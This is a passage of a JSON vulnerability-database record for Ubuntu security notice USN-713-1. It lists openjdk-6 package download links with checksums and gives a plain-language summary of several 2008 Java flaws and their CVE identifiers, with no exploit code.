http://ports.ubuntu.com/pool/main/o/openjdk-6/openjdk-6-jdk_6b12-0ubuntu6.1_sparc.deb\r\n Size/MD5: 9927636 7c32c7c800f01a2dc1ae878eceade91d\r\n http://ports.ubuntu.com/pool/main/o/openjdk-6/openjdk-6-jre-headless_6b12-0ubuntu6.1_sparc.deb\r\n Size/MD5: 25175260 a09637fa2629b9ffa58d932078a44d67\r\n http://ports.ubuntu.com/pool/main/o/openjdk-6/openjdk-6-jre_6b12-0ubuntu6.1_sparc.deb\r\n Size/MD5: 232954 17e8a53c99ea3ac34c0018b2e60a2be8\r\n", "modified": "2009-01-31T00:00:00", "published": "2009-01-31T00:00:00", "id": "SECURITYVULNS:DOC:21257", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:21257", "title": "[USN-713-1] openjdk-6 vulnerabilities", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "ubuntu": [{"lastseen": "2019-05-29T17:21:45", "bulletinFamily": "unix", "description": "It was discovered that Java did not correctly handle untrusted applets. If a user were tricked into running a malicious applet, a remote attacker could gain user privileges, or list directory contents. (CVE-2008-5347, CVE-2008-5350)\n\nIt was discovered that Kerberos authentication and RSA public key processing were not correctly handled in Java. A remote attacker could exploit these flaws to cause a denial of service. (CVE-2008-5348, CVE-2008-5349)\n\nIt was discovered that Java accepted UTF-8 encodings that might be handled incorrectly by certain applications. A remote attacker could bypass string filters, possible leading to other exploits. (CVE-2008-5351)\n\nOverflows were discovered in Java JAR processing. If a user or automated system were tricked into processing a malicious JAR file, a remote attacker could crash the application, leading to a denial of service. (CVE-2008-5352, CVE-2008-5354)\n\nIt was discovered that Java calendar objects were not unserialized safely. If a user or automated system were tricked into processing a specially crafted calendar object, a remote attacker could execute arbitrary code with user privileges. (CVE-2008-5353)\n\nIt was discovered that the Java image handling code could lead to memory corruption. If a user or automated system were tricked into processing a specially crafted image, a remote attacker could crash the application, leading to a denial of service. (CVE-2008-5358, CVE-2008-5359)\n\nIt was discovered that temporary files created by Java had predictable names. If a user or automated system were tricked into processing a specially crafted JAR file, a remote attacker could overwrite sensitive information. (CVE-2008-5360)", "modified": "2009-01-27T00:00:00", "published": "2009-01-27T00:00:00", "id": "USN-713-1", "href": "https://usn.ubuntu.com/713-1/", "title": "openjdk-6 vulnerabilities", "type": "ubuntu", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}
